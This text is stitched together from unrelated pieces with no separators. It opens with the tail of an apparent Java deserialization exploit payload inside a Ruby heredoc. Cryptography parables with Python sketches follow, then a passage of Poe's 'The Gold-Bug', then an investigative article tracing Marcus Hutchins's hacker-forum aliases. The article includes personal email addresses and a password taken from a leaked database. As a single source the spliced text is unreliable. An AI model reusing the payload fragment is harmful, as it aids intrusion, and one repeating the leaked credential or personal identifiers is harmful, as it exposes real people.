    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>
EOF
  end
end
1.
Professor Krankenstein was the most influential genetic engineer of his time.
When, in the spring of 2030, he almost incidentally invented the most terrible biological weapon known to humanity it took him about three seconds to realize that should his invention fall into the hands of one of the superpowers -- or into the hands of any common idiot, really -- it could well mean the end of the human race.
He wasted no time. He destroyed all the artifacts in the lab. He burned all the notes and the hard disks of all the computers they had used in the project. He seeded false information all over the place to lead future investigators off the track.
Now, left with the last remaining copy of the doomsgerm recipe, he was contemplating whether to destroy it.
Yes, destroying it would keep the world safe. But if such a breakthrough in genetic engineering was used in a different way it could have solved the hunger problem by producing enough artificial food to feed the swelling population of Earth. And if global warming went catastrophic, it could have been used to engineer microorganisms super-efficient at sequestering carbon dioxide and methane from atmosphere.
In the end he decided not to destroy it but rather to encrypt the recipe, put it into a tungsten box, encase the box in concrete and drop it from a cruise ship into Mariana Trench. The story would have ended there if it were not for one Hendrik Koppel, a rather simple-minded person whom professor Krankenstein hired to help him move the tungsten-concrete box around. The professor hadn't even met him before he destroyed all his doomsgerm research. Still, Hendrik somehow realized that the issue was of interest to superpowers (was professor Krankenstein sleep-talking?) and sold the information about the location of the box to several governments.
By the beginning of October the news hit that an American aircraft carrier was heading in the direction of Mariana Trench.
Apparently, there was also a Russian nuclear submarine on its way to the same location.
The Chinese government had sent a fleet of smaller, more versatile, oceanographic vessels.
After the initial bout of despair, professor Krankenstein realised that with his superior knowledge of the position of the box he could possibly get to the location first and destroy the box using an underwater bomb.
He used his life savings to buy a rusty old ship called Amor Patrio, manned it with his closest collaborators and set up for Pacific Ocean.
...
Things haven't gone well. News reported that Americans and Chinese were approaching the area while Amor Patrio's engine broke and the crew was working around the clock to fix it.
Finally, they fixed it and approached Mariana Trench.
It was at that point that the news reached them: The box was found by Russians and transported to Moscow. It was now stored in the vault underneath KGB headquarters. There was a whole division of spetsnaz guarding the building. The building itself was filled with special agents, each trained in twelve ways of silently killing a person.
Professor Krankenstein and his associates held a meeting on board Amor Patrio, in the middle of the Pacific Ocean. People came up with desperate proposals: Let's dig a tunnel underneath Moscow river. Let's blackmail the Russians by re-creating the virus and threatening to disperse it in Russia. Nuke the entire Moskovskaya Oblast! There was no end to the wild and desperate proposals.
Once the stream of proposals dried up, everyone looked at professor Krankenstein, awaiting his decision.
The silence was almost palpable.
Professor Krankenstein slowly took out his iconic pipe and lighted it with the paper which had the decryption key written on it.
13.
No full story yet, but let's assume a king is at a quest. At some point he realizes that a small item, say a specific hairpin, is needed to complete the quest. He clearly remembers he used to own the hairpin, but he has no idea whether it's still in his possession and if so, where exactly it is. He sends a messenger home asking his counsellors to look for the hairpin and let him know whether they've found it or not.
King's enemies need that information as well, so the next day, when the messenger is returning, they ambush him and take the message. Unfortunately, the message is encrypted. The messenger himself knows nothing about the pin.
Many experienced cryptographers work around the clock for days in a row to decrypt the message, but to no avail.
Finally, a kid wanders into the war room. She asks about what they are doing and after some thinking she says: "I know nothing about the high art of cryptography and in no way can I compare to the esteemed savants in this room. What I know, though, is that the King's palace has ten thousand rooms, each full of luxury, pictures and finely carved furniture. To find a hairpin in such a place could take weeks if not months. If there was no hairpin it would take at least that long before they could send the messenger back with a negative reply. So, if the messenger was captured on his way back on the very next day, it can mean only a single thing: the hairpin was found and your encrypted message says so."
20.
Here Legrand, having re-heated the parchment, submitted it to my inspection. The following characters were rudely traced, in a red tint, between the death's-head and the goat:
53++!305))6*;4826)4+.)4+);806*;48!8`60))85;]8*:+*8!83(88)5*!; 46(;88*96*?;8)*+(;485);5*!2:*+(;4956*2(5*-4)8`8*; 4069285);)6 !8)4++;1(+9;48081;8:8+1;48!85;4)485!528806*81(+9;48;(88;4(+?3 4;48)4+;161;:188;+?;
"But," said I, returning him the slip, "I am as much in the dark as ever. Were all the jewels of Golconda awaiting me on my solution of this enigma, I am quite sure that I should be unable to earn them."
"And yet," said Legrand, "the solution is by no means so difficult as you might be led to imagine from the first hasty inspection of the characters. These characters, as any one might readily guess, form a cipher --that is to say, they convey a meaning; but then, from what is known of Kidd, I could not suppose him capable of constructing any of the more abstruse cryptographs. I made up my mind, at once, that this was of a simple species --such, however, as would appear, to the crude intellect of the sailor, absolutely insoluble without the key."
"And you really solved it?"
"Readily; I have solved others of an abstruseness ten thousand times greater. Circumstances, and a certain bias of mind, have led me to take interest in such riddles, and it may well be doubted whether human ingenuity can construct an enigma of the kind which human ingenuity may not, by proper application, resolve. In fact, having once established connected and legible characters, I scarcely gave a thought to the mere difficulty of developing their import.
"In the present case --indeed in all cases of secret writing --the first question regards the language of the cipher; for the principles of solution, so far, especially, as the more simple ciphers are concerned, depend on, and are varied by, the genius of the particular idiom. In general, there is no alternative but experiment (directed by probabilities) of every tongue known to him who attempts the solution, until the true one be attained. But, with the cipher now before us, all difficulty is removed by the signature. The pun on the word 'Kidd' is appreciable in no other language than the English. But for this consideration I should have begun my attempts with the Spanish and French, as the tongues in which a secret of this kind would most naturally have been written by a pirate of the Spanish main. As it was, I assumed the cryptograph to be English.
"You observe there are no divisions between the words. Had there been divisions, the task would have been comparatively easy. In such case I should have commenced with a collation and analysis of the shorter words, and, had a word of a single letter occurred, as is most likely, (a or I, for example,) I should have considered the solution as assured. But, there being no division, my first step was to ascertain the predominant letters, as well as the least frequent. Counting all, I constructed a table, thus:
Of the character 8 there are 33.
; " 26. 4 " 19. + ) " 16. * " 13. 5 " 12. 6 " 11. ! 1 " 8. 0 " 6. 9 2 " 5. : 3 " 4. ? " 3. ` " 2. - . " 1.
"Now, in English, the letter which most frequently occurs is e. Afterwards, the succession runs thus: a o i d h n r s t u y c f g l m w b k p q x z. E however predominates so remarkably that an individual sentence of any length is rarely seen, in which it is not the prevailing character.
"Here, then, we have, in the very beginning, the groundwork for something more than a mere guess. The general use which may be made of the table is obvious --but, in this particular cipher, we shall only very partially require its aid. As our predominant character is 8, we will commence by assuming it as the e of the natural alphabet. To verify the supposition, let us observe if the 8 be seen often in couples --for e is doubled with great frequency in English --in such words, for example, as 'meet,' 'fleet,' 'speed, 'seen,' 'been,' 'agree,' &c. In the present instance we see it doubled less than five times, although the cryptograph is brief.
"Let us assume 8, then, as e. Now, of all words in the language, 'the' is the most usual; let us see, therefore, whether they are not repetitions of any three characters in the same order of collocation, the last of them being 8. If we discover repetitions of such letters, so arranged, they will most probably represent the word 'the.' On inspection, we find no less than seven such arrangements, the characters being ;48. We may, therefore, assume that the semicolon represents t, that 4 represents h, and that 8 represents e --the last being now well confirmed. Thus a great step has been taken.
"But, having established a single word, we are enabled to establish a vastly important point; that is to say, several commencements and terminations of other words. Let us refer, for example, to the last instance but one, in which the combination ;48 occurs --not far from the end of the cipher. We know that the semicolon immediately ensuing is the commencement of a word, and, of the six characters succeeding this 'the,' we are cognizant of no less than five. Let us set these characters down, thus, by the letters we know them to represent, leaving a space for the unknown--
t eeth.
"Here we are enabled, at once, to discard the 'th,' as forming no portion of the word commencing with the first t; since, by experiment of the entire alphabet for a letter adapted to the vacancy we perceive that no word can be formed of which this th can be a part. We are thus narrowed into
t ee,
and, going through the alphabet, if necessary, as before, we arrive at the word 'tree,' as the sole possible reading. We thus gain another letter, r, represented by (, with the words 'the tree' in juxtaposition.
"Looking beyond these words, for a short distance, we again see the combination ;48, and employ it by way of termination to what immediately precedes. We have thus this arrangement:
the tree ;4(+?34 the,
or substituting the natural letters, where known, it reads thus:
the tree thr+?3h the.
"Now, if, in place of the unknown characters, we leave blank spaces, or substitute dots, we read thus:
the tree thr...h the,
when the word 'through' makes itself evident at once. But this discovery gives us three new letters, o, u and g, represented by + ? and 3.
"Looking now, narrowly, through the cipher for combinations of known characters, we find, not very far from the beginning, this arrangement,
83(88, or egree, which, plainly, is the conclusion of the word 'degree,' and gives us another letter, d, represented by !.
"Four letters beyond the word 'degree,' we perceive the combination
46(;88*.
"Translating the known characters, and representing the unknown by dots, as before, we read thus:
th.rtee.
an arrangement immediately suggestive of the word 'thirteen,' and again furnishing us with two new characters, i and n, represented by 6 and *.
"Referring, now, to the beginning of the cryptograph, we find the combination,
53++!.
"Translating, as before, we obtain
.good,
which assures us that the first letter is A, and that the first two words are 'A good.'
"To avoid confusion, it is now time that we arrange our key, as far as discovered, in a tabular form. It will stand thus:
5 represents a ! " d 8 " e 3 " g 4 " h 6 " i * " n + " o ( " r ; " t
"We have, therefore, no less than ten of the most important letters represented, and it will be unnecessary to proceed with the details of the solution. I have said enough to convince you that ciphers of this nature are readily soluble, and to give you some insight into the rationale of their development. But be assured that the specimen before us appertains to the very simplest species of cryptograph. It now only remains to give you the full translation of the characters upon the parchment, as unriddled. Here it is:
'A good glass in the bishop's hostel in the devil's seat twenty-one degrees and thirteen minutes northeast and by north main branch seventh limb east side shoot from the left eye of the death's-head a bee line from the tree through the shot fifty feet out.'"
"But," said I, "the enigma seems still in as bad a condition as ever. How is it possible to extort a meaning from all this jargon about 'devil's seats,' 'death's-heads,' and 'bishop's hostel'?"
"I confess," replied Legrand, "that the matter still wears a serious aspect, when regarded with a casual glance. My first endeavor was to divide the sentence into the natural division intended by the cryptographist."
"You mean, to punctuate it?"
"Something of that kind."
"But how was it possible to effect this?"
"I reflected that it had been a point with the writer to run his words together without division, so as to increase the difficulty of solution. Now, a not overacute man, in pursuing such an object, would be nearly certain to overdo the matter. When, in the course of his composition, he arrived at a break in his subject which would naturally require a pause, or a point, he would be exceedingly apt to run his characters, at this place, more than usually close together. If you will observe the MS., in the present instance, you will easily detect five such cases of unusual crowding. Acting on this hint, I made the division thus:
'A good glass in the bishop's hostel in the devil's --twenty-one degrees and thirteen minutes --northeast and by north --main branch seventh limb east side --shoot from the left eye of the death's-head --a bee-line from the tree through the shot fifty feet out.'"
"Even this division," said I, "leaves me still in the dark."
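Legrand's hand tally is easy to reproduce mechanically. A short Python sketch using the transcription of the cryptogram given above (its punctuation stands in for Poe's original printer's symbols, so a count may differ by a character or two from the table in the text):

```python
from collections import Counter

# Transcription of Kidd's cryptogram as printed above
cryptogram = (
    "53++!305))6*;4826)4+.)4+);806*;48!8`60))85;]8*:+*8!83(88)5*!;"
    "46(;88*96*?;8)*+(;485);5*!2:*+(;4956*2(5*-4)8`8*;"
    "4069285);)6!8)4++;1(+9;48081;8:8+1;48!85;4)485!528806*81(+9;"
    "48;(88;4(+?34;48)4+;161;:188;+?;"
)

# Tally every symbol, most frequent first -- the same table Legrand builds,
# from which 8 is guessed to be 'e' and ;48 the word 'the'
counts = Counter(cryptogram)
for symbol, n in counts.most_common():
    print(symbol, n)
```

As in Legrand's table, 8 dominates, with ; second and 4 third, which is what licenses the e / the guesses that unravel the rest.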
32.
A portal suddenly opened on the starboard ejecting a fleet of imperial pursuit vessels. The propulsion system of my ship got hit before the shield activated. I’ve tried to switch on the backup drive but before it charged to 5% I was already dangling off a dozen tractor beams.
It wasn’t much of a fight. They just came and picked me up as one would pick up a box of frozen strawberries in a supermarket.
I must have passed out because of pressure loss because the next thing I remember is being in a plain white room with my hands cuffed behind my back.
There was a sound of door opening and a person walked into my field of vision.
It took me few seconds to realize who the man was. He was wearing an old-fashioned black suit and a bowler hat, black umbrella in his hand, not the baggy trousers seen on his official portraits. But then he smiled and showed the glistening golden teeth on the left side and his own healthy camel-like teeth on the right and the realization hit me.
It was him. Beylerbey Qgdzzxoglu in person.
“Peace be upon you,” he said. Then he sat down on the other side of a little coffee table, made himself comfortable and put his umbrella on the floor.
“We have a little matter to discuss, you and I,” he said.
He took a paper out of his pocket and put in on the coffee table, spinning it so that I can read it.
“Attack the Phlesmus Pashalik,” said one line.
“Attack the Iconium Cluster,” said the line below it.
The rest of the sheet was empty except for holographic seal of High Command of Proximian Insurgency.
"Comandante Ribeira is no fool," he said, "And this scrap of paper is not going to convince me that he's going to split his forces and attack both those places at the same time. Our strategic machines are vastly more powerful than Proximian ones, they've been running hot for the past week and our lab rats tell us that there's no way to win that way."
"You are right, O leader of men," I said.
I knew that this kind of empty flattery was used at the Sublime Porte but I was not sure whether it wasn't reserved for the sultan alone.
Qgdzzxoglu smiled snarkily but didn't say anything. Maybe I was going to live in the end.
"I have no loyalty to the Proximian cause; before the rebellion I lived happily and had no thoughts of betrayal. And now, hoping for your mercy, I am going to disclose the true meaning of this message to you."
"It is a code, O you, whose slipper weighs heavily upon the neck of nations," I said, "The recipient is supposed to ignore the first sentence and only follow the second one."
I hoped I hadn't overdone it. Being honest with the enemy is hard.
"So you are trying to convince me that de Ribeira is going to attack Iconium," he gave me a sharp look, apparently trying to determine whether I was lying or not. "And you know what? We've got our reports. And our reports are saying that rebels will try to trick us into moving all our forces into Iconium and then attack pashalik of Phlesmus while it's undefended. And if that's what you are trying to do bad things are going to happen to your proboscis."
"The Most Holy Cross, John XXIII and Our Lady of Africa have already got a command to move to Iconium cluster. And you should expect at least comparable fire force from elsewhere."
...
The messenger has no intention of suffering to win someone else's war. At the same time it's clear that if he continues to tell the truth he will be tortured. So he says that the general is right and it's the first sentence that should be taken into account.
The general begins to feel a bit uneasy at this point. He has two contradictory confessions and it's not at all clear which one is correct.
He orders the torture to proceed, only to make the messenger change his confession once again.
...
“Today, the God, the Compassionate, the Merciful have taught me that there are secrets that cannot be given away. You cannot give them away to save yourself from torture. You cannot give them away to save your kids from being sold to slavery. You cannot give them away to prevent the end of the world. You just cannot give them away and whether you want to or not matters little.”
54.
Here's a simple game for kids that shows how asymmetric encryption works in principle. It makes intuitive the fact that, with only the public key at your disposal, encryption may be easy while decryption may be so hard as to be basically impossible, and it gives everyone hands-on experience with a simple asymmetric encryption system.
Here's how it works:
Buy a dictionary of some exotic language. The language being exotic makes it improbable that any of the kids involved in the game would understand it. Also, it makes cheating by using Google Translate impossible.
Let's say you've opted for Eskimo language. The story of the game can be located at the North Pole after all.
You should prefer a dictionary that comes in two bands: English-Eskimo dictionary and Eskimo-English dictionary. The former will play the role of public key and the latter the role of secret key. Obviously, if there's no two-band dictionary available, you'll have to cut a single-band one in two.
To distribute the public key to everyone involved in the game you can either buy multiple copies of English-Eskimo dictionary, which may be expensive, or you can simply place a single copy at a well-known location. In school library, at a local mom-and-pop shop or at a secret place known only to the game participants.
If a kid wants to send an encrypted message to the owner of the secret key, they just use the public key (English-Eskimo dictionary) to translate the message, word-by-word, from English to Eskimo. The owner of the secret key (Eskimo-English dictionary) can then easily decrypt the message by translating it back into English.
However, if the message gets intercepted by any other game participant, decrypting it would be an extremely time consuming activity. Each word of the message would have to be found in English-Eskimo dictionary, which would in turn mean scanning the whole dictionary in a page-by-page and word-by-word manner!
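The scheme can be sketched in a few lines of Python. The "Eskimo" words below are invented placeholders, not real vocabulary; the forward dictionary plays the public key and its inversion the secret key:

```python
# Toy model of the dictionary game. The "Eskimo" words are invented
# placeholders, not real vocabulary.
public_key = {          # English -> "Eskimo": anyone may encrypt with this
    "meet": "qanniq",
    "at": "siku",
    "the": "nuna",
    "north": "nanuq",
    "pole": "aput",
}
secret_key = {v: k for k, v in public_key.items()}  # the reverse dictionary

def encrypt(message, pub):
    # word-by-word translation using the English-Eskimo band
    return [pub[word] for word in message.split()]

def decrypt(ciphertext, sec):
    # word-by-word translation back using the Eskimo-English band
    return " ".join(sec[word] for word in ciphertext)

ct = encrypt("meet at the north pole", public_key)
print(ct)
print(decrypt(ct, secret_key))

# An eavesdropper with only public_key must scan its VALUES word by word --
# the page-by-page dictionary search described above.
```

The analogy only holds for the paper version: inverting a Python dict is one line, while inverting a printed dictionary by hand is what makes deriving the private key impractical for the kids.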
78.
It's a puppet show. There are two hills on the stage with country border between them. Law-abiding citizen is on the right hill. Smuggler enters the stage on the left.
SMUGGLER: Hey, you!
CITIZEN: Who? Me?
SMUGGLER: Do you like booze?
CITIZEN: Sure I do. And who are you?
SMUGGLER: I'm the person who will sell you some booze.
CITIZEN: What about cigarettes?
SMUGGLER: Sure thing. Cheap Ukrainian variety for $1 a pack. Also Slovenian Mariboro brand.
CITIZEN: Thanks God! I am getting sick of our government trying to make me healthy!
Border patrol emerges from a bush in the middle of the stage.
PATROL: Forget about it, guys! This is a state border. Nothing's gonna pass one way or the other. You better pack your stuff and go home.
SMUGGLER: Ignore him. We'll meet later on at some other place, without border patrol around, and you'll get all the booze and cigarettes you want.
PATROL: Ha! I would like to see that. Both of you are going to end up in jail.
CITIZEN: He's right. If you tell me where to meet, he's going to hear that, go there and arrest us.
...
Smuggler has a list of possible places to meet:
- Big oak at 57th mile of the border.
- Lower end of Abe Smith's pasture.
- ...
- ...
He obfuscates each entry and shouts them to the citizen in no particular order.
The citizen chooses one of the puzzles and de-obfuscates it. It takes him 10 minutes. The de-obfuscated message reads: "18. Behind the old brick factory."
CITIZEN (cries): Eighteen!
SMUGGLER: Ok, got it, let's meet there in an hour!
PATROL: Oh my, oh my. I am much better at de-obfuscation than that moron citizen. I've already got two messages solved. But one has number 56, the other number 110. I have no idea which one is going to be number 18. There's no way I can find the right one in just one hour!
The curtain comes down. Happy gulping sounds can be heard from the backstage.
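The smuggler's trick is essentially a Merkle puzzle. A minimal sketch, assuming each meeting place is sealed under a deliberately tiny (16-bit) key, so opening one chosen puzzle is cheap while opening many of them is not:

```python
import hashlib
import os

def seal(msg: bytes):
    """Obfuscate msg under a random 16-bit key (cheap to brute-force once)."""
    key = os.urandom(2)
    pad = hashlib.sha256(key).digest()
    ct = bytes(m ^ p for m, p in zip(msg, pad))   # msg must be <= 32 bytes
    tag = hashlib.sha256(msg).digest()[:4]        # lets a solver recognize success
    return ct, tag

def solve(ct: bytes, tag: bytes):
    """Try all 2**16 keys until the checksum matches."""
    for k in range(2 ** 16):
        pad = hashlib.sha256(k.to_bytes(2, "big")).digest()
        msg = bytes(c ^ p for c, p in zip(ct, pad))
        if hashlib.sha256(msg).digest()[:4] == tag:
            return msg
    return None

places = [b"18. Behind the old brick factory", b"56. Big oak, 57th mile"]
sealed = [seal(p) for p in places]

# The citizen solves ONE puzzle (the 10 minutes of work in the sketch);
# the patrol must solve about half of all of them to find the right one.
print(solve(*sealed[0]))
```

The key names and parameters here are illustrative assumptions; the point is only the asymmetry: the citizen pays one puzzle's worth of work, the eavesdropper pays work proportional to the number of puzzles shouted.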
99.
Mr. X is approached in the subway by a guy who claims to be an alien stranded on Earth and to possess a time machine that allows him to know the future. He needs funds to fix his flying saucer, but filling in winning numbers for next week's lottery would create a time paradox. Therefore, he's willing to sell next week's winning numbers to Mr. X at a favourable price.
Mr. X, as gullible as he is, feels that this may be a scam and asks for a proof. Alien gives him the next week's winning numbers in encrypted form so that Mr. X can't use them and then decide not to pay for them. After the lottery draw he'll give Mr. X the key to unlock the file and Mr. X can verify that the prediction was correct.
After the draw, Mr. X gets the key and lo and behold, the numbers are correct! To rule out the possibility that it happened by chance, they do the experiment twice. Then thrice.
Finally, Mr. X is persuaded. He pays the alien and gets the set of numbers for the next week's draw.
But the numbers drawn are completely different.
And now the question: How did the scam work?
NOTE: The claim about the time paradox is super weak. To improve the story the alien can ask for something non-monetary (sex, political influence). Or, more generally, positive demonstration of knowledge of the future can be used to make people do what you want. E.g. "I know that an asteroid is going to destroy Earth in one year. Give me all your money to build a starship to save you."
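One way to make the scam concrete (an assumption about the mechanics, since the story leaves it as a question): if the "encryption" is a one-time pad, the key can be chosen after the draw so that the old ciphertext decrypts to whatever numbers actually won.

```python
import os

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Before the draw: hand over pure random noise as the "encrypted prediction".
ciphertext = os.urandom(16)

# After the draw: learn the actual winning numbers (illustrative values)...
winning = b"07 13 21 34 42  "

# ...and craft the key retroactively so the old noise "decrypts" to them.
key = xor(ciphertext, winning)

print(xor(ciphertext, key))  # the mark sees a perfect prediction
```

The ciphertext commits the alien to nothing; every possible "prediction" is reachable by some key, so the demonstration can be repeated as many times as Mr. X demands.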
05 Sep 17
Who Is Marcus Hutchins?
In early August 2017, FBI agents in Las Vegas arrested 23-year-old British security researcher Marcus Hutchins on suspicion of authoring and/or selling “Kronos,” a strain of malware designed to steal online banking credentials. Hutchins was virtually unknown to most in the security community until May 2017 when the U.K. media revealed him as the “accidental hero” who inadvertently halted the global spread of WannaCry, a ransomware contagion that had taken the world by storm just days before.
Relatively few knew it before his arrest, but Hutchins has for many years authored the popular cybersecurity blog MalwareTech. When this fact became more widely known — combined with his hero status for halting Wannacry — a great many MalwareTech readers quickly leapt to his defense to denounce his arrest. They reasoned that the government’s case was built on flimsy and scant evidence, noting that Hutchins has worked tirelessly to expose cybercriminals and their malicious tools. To date, some 226 supporters have donated more than $14,000 to his defense fund.
Marcus Hutchins, just after he was revealed as the security expert who stopped the WannaCry worm. Image: twitter.com/malwaretechblog
At first, I did not believe the charges against Hutchins would hold up under scrutiny. But as I began to dig deeper into the history tied to dozens of hacker forum pseudonyms, email addresses and domains he apparently used over the past decade, a very different picture began to emerge.
In this post, I will attempt to describe and illustrate more than three weeks’ worth of connecting the dots from what appear to be Hutchins’ earliest hacker forum accounts to his real-life identity. The clues suggest that Hutchins began developing and selling malware in his mid-teens — only to later develop a change of heart and earnestly endeavor to leave that part of his life squarely in the rearview mirror.
GH0STHOSTING/IARKEY
I began this investigation with a simple search of domain name registration records at domaintools.com [full disclosure: Domain Tools recently was an advertiser on this site]. A search for “Marcus Hutchins” turned up a half dozen domains registered to a U.K. resident by the same name who supplied the email address “surfallday2day@hotmail.co.uk.”
One of those domains — Gh0sthosting[dot]com (the third character in that domain is a zero) — corresponds to a hosting service that was advertised and sold circa 2009-2010 on Hackforums[dot]net, a massively popular forum overrun with young, impressionable men who desperately wish to be elite coders or hackers (or at least recognized as such by their peers).
The surfallday2day@hotmail.co.uk address tied to Gh0sthosting’s initial domain registration records also was used to register a Skype account named Iarkey that listed its alias as “Marcus.” A Twitter account registered in 2009 under the nickname “Iarkey” points to Gh0sthosting[dot]com.
Gh0sthosting was sold by a Hackforums user who used the same Iarkey nickname, and in 2009 Iarkey told fellow Hackforums users in a sales thread for his business that Gh0sthosting was “mainly for blackhats wanting to phish.” In a separate post just a few days apart from that sales thread, Iarkey responds that he is “only 15” years old, and in another he confirms that his email address is surfallday2day@hotmail.co.uk.
A review of the historic reputation tied to the Gh0sthosting domain suggests that at least some customers took Iarkey up on his offer: Malwaredomainlist.com, for example, shows that around this same time in 2009 Gh0sthosting was observed hosting plenty of malware, including trojan horse programs, phishing pages and malware exploits.
A “reverse WHOIS” search at Domaintools.com shows that Iarkey’s surfallday2day email address was used initially to register several other domains, including uploadwith[dot]us and thecodebases[dot]com.
Shortly after registering Gh0sthosting and other domains tied to his surfallday2day@hotmail.co.uk address, Iarkey evidently thought better of including his real name and email address in his domain name registration records. Thecodebases[dot]com, for example, changed its WHOIS ownership to a “James Green” in the U.K., and switched the email to “herpderpderp2@hotmail.co.uk.”
A reverse WHOIS lookup at domaintools.com for that email address shows it was used to register a Hackforums parody (or phishing?) site called Heckforums[dot]net. The domain records showed this address was tied to a Hackforums clique called “Atthackers.” The records also listed a Michael Chanata from Florida as the owner. We’ll come back to Michael Chanata and Atthackers at the end of this post.
DA LOSER/FLIPERTYJOPKINS
As early as 2009, Iarkey was outed several times on Hackforums as being Marcus Hutchins from the United Kingdom. In most of those instances he makes no effort to deny the association — and in a handful of posts he laments that fellow members felt the need to “dox” him by posting his real address and name in the hacking forum for all to see.
Iarkey, like many other extremely active Hackforums users, changed his nickname on the forum constantly, and two of his early nicknames on Hackforums around 2009 were “Flipertyjopkins” and “Da Loser.”
Happily, Hackforums has a useful feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account.
This is especially evident in multi-page Hackforums discussion threads that span many days or weeks: If a user changes his nickname during that time, the forum is set up so that it includes the user’s most previous nickname in any replies that quote the original nickname — ostensibly so that users can follow along with who’s who and who said what to whom.
In the screen shot below, for instance, we can see one of Hutchins’ earliest accounts — Da Loser — being quoted under his Flipertyjopkins nickname.
Both the Da Loser and Flipertyjopkins identities on Hackforums referenced the same domains in 2009 as theirs — Gh0sthosting — as well as another domain called “hackblack.co[dot]uk.” Da Loser references the hackblack domain as the place where other Hackforums users can download “the sourcecode of my IE/MSN messenger password stealer (aka M_Stealer).”
In another post, Da Loser brags about how his password stealing program goes undetected by multiple antivirus scanners, pointing to a (now deleted) screenshot at a Photobucket account for a “flipertyjopkins”:
Another screenshot from Da Loser’s postings in June 2009 shows him advertising the Hackblack domain and the Surfallday2day@hotmail.co.uk address:
Hackforums user “Da Loser” advertises his “Hackblack” hosting and points to the surfallday2day email address.
An Internet search for this Hackblack domain reveals a thread on the Web hosting forum MyBB started by a user Flipertyjopkins, who asks other members for help configuring his site, which he lists as http://hackblack.freehost10[dot]com.
Poking around the Web for these nicknames and domains turned up a Youtube user account named Flipertyjopkins that includes several videos uploaded 7-8 years ago that instruct viewers on how to use various types of password-stealing malware. In one of the videos — titled “Hotmail cracker v1.3” — Flipertyjopkins narrates how to use a piece of malware by the same name to steal passwords from unsuspecting victims.
Approximately two minutes and 48 seconds into the video, we can briefly see an MSN Messenger chat window shown behind the Microsoft Notepad application he is using to narrate the video. The video clearly shows that the MSN Messenger client is logged in with the address “hutchins22@hotmail.com.”
To close out the discussion of Flipertyjopkins, I should note that this email address showed up multiple times in the database leak from Hostinger.co.uk, a British Web hosting company that got hacked in 2015. A copy of that database can be found in several places online, and it shows that one Hostinger customer named Marcus used an account under the email address flipertyjopkins@gmail.com.
According to the leaked user database, the password for that account — “emmy009” — also was used to register two other accounts at Hostinger, including the usernames “hacker” (email address: flipertyjopkins@googlemail.com) and “flipertyjopkins” (email: surfallday2day@hotmail.co.uk).
ELEMENT PRODUCTS/GONE WITH THE WIND
Most of the activities and actions that can be attributed to Iarkey/Flipertyjopkins/Da Loser et al. on Hackforums are fairly small-time — and hardly rise to the level of coding from scratch a complex banking trojan and selling it to cybercriminals.
However, multiple threads on Hackforums state that Hutchins around 2011-2012 switched to two new nicknames that corresponded to users who were far more heavily involved in coding and selling complex malicious software: “Element Products,” and later, “Gone With The Wind.”
Hackforums’ nickname preservation feature leaves little doubt that the user Element Products at some point in 2012 changed his nickname to Gone With the Wind. However, for almost a week I could not see any signs of a connection between these two accounts and the ones previously and obviously associated with Hutchins (Flipertyjopkins, Iarkey, etc.).
In the meantime, I endeavored to find out as much as possible about Element Products — a suite of software and services including a keystroke logger, a “stresser” or online attack service, as well as a “no-distribute” malware scanner.
Unlike legitimate scanning services such as Virustotal — which scan malicious software against dozens of antivirus tools and then share the output with all participating antivirus companies — no-distribute scanners are made and marketed to malware authors who wish to see how broadly their malware is detected without tipping off the antivirus firms to a new, more stealthy version of the code.
Indeed, Element Scanner — which was sold in subscription packages starting at $40 per month — scanned all customer malware with some 37 different antivirus tools. But according to posts from Gone With the Wind, the scanner merely resold the services of scan4you[dot]net, a multiscanner that was extremely powerful and popular for several years across a variety of underground cybercrime forums.
According to a story at Bleepingcomputer.com, scan4you disappeared in July 2017, around the same time that two Latvian men were arrested for running an unnamed no-distribute scanner.
[Side note: Element Scanner was later incorporated as the default scanning application of “Blackshades,” a remote access trojan that was extremely popular on Hackforums for several years until its developers and dozens of customers were arrested in an international law enforcement sting in May 2014. Incidentally, as the story linked in the previous sentence explains, the administrator and owner of Hackforums would play an integral role in setting up many of his forum’s users for the Blackshades sting operation.]
According to one thread on Hackforums, Element Products was sold in 2012 to another Hackforums user named “Dal33t.” This was the nickname used by Ammar Zuberi, a young man from Dubai who — according to this January 2017 KrebsOnSecurity story — may have been associated with a group of miscreants on Hackforums that specialized in using botnets to take high-profile Web sites offline. Zuberi could not be immediately reached for comment.
I soon discovered that Element Products was by far the least harmful product that this user sold on Hackforums. In a separate thread in 2012, Element Products announces the availability of a new product he had for sale — dubbed the “Ares Form Grabber” — a program that could be used to surreptitiously steal usernames and passwords from victims.
Element Products/Gone With The Wind also advertised himself on Hackforums as an authorized reseller of the infamous exploit kit known as “Blackhole.” Exploit kits are programs made to be stitched into hacked and malicious Web sites so that when visitors browse to the site with outdated and insecure browser plugins the browser is automatically infected with whatever malware the attacker wishes to foist on the victim.
In addition, Element Products ran a “bot shop,” in which he sold access to bots claimed to have enslaved through his own personal use of Blackhole:
Gone With The Wind’s “Bot Shop,” which sold access to computers hacked with the help of the Blackhole exploit kit.
A bit more digging showed that the Element Products user on Hackforums co-sold his wares along with another Hackforums user named “Kill4Joy,” who advertised his contact address as kill4joy@live.com.
Ironically, Hackforums was itself hacked in 2012, and a leaked copy of the user database from that hack shows this Kill4Joy user initially registered on the forum in 2011 with the email address rohang93@live.com.
A reverse WHOIS search at domaintools.com shows that email address was used to register several domain names, including contegoprint.info. The registration records for that domain show that it was registered by a Rohan Gupta from Illinois.
I learned that Gupta is now attending graduate school at the University of Illinois at Urbana-Champaign, where he is studying computer engineering. Reached via telephone, Gupta confirmed that he worked with the Hackforums user Element Products six years ago, but said he only handled sales for the Element Scanner product, which he says was completely legal.
“I was associated with Element Scanner which was non-malicious,” Gupta said. “It wasn’t black hat, and I wasn’t associated with the programming, I just assisted with the sales.”
Gupta said his partner and developer of the software went by the name Michael Chanata and communicated with him via a Skype account registered to the email address atthackers@hotmail.com.
Recall that we heard at the beginning of this story that the name Michael Chanata was tied to Heckforums.net, a domain closely connected to the Iarkey nickname on Hackforums. Curious to see if this Michael Chanata character showed up somewhere on Hackforums, I used the forum’s search function to find out.
The following screenshot from a July 2011 Hackforums thread suggests that Michael Chanata was yet another nickname used by Da Loser, a Hackforums account associated with Marcus Hutchins’ early email addresses and Web sites.
BV1/ORGY
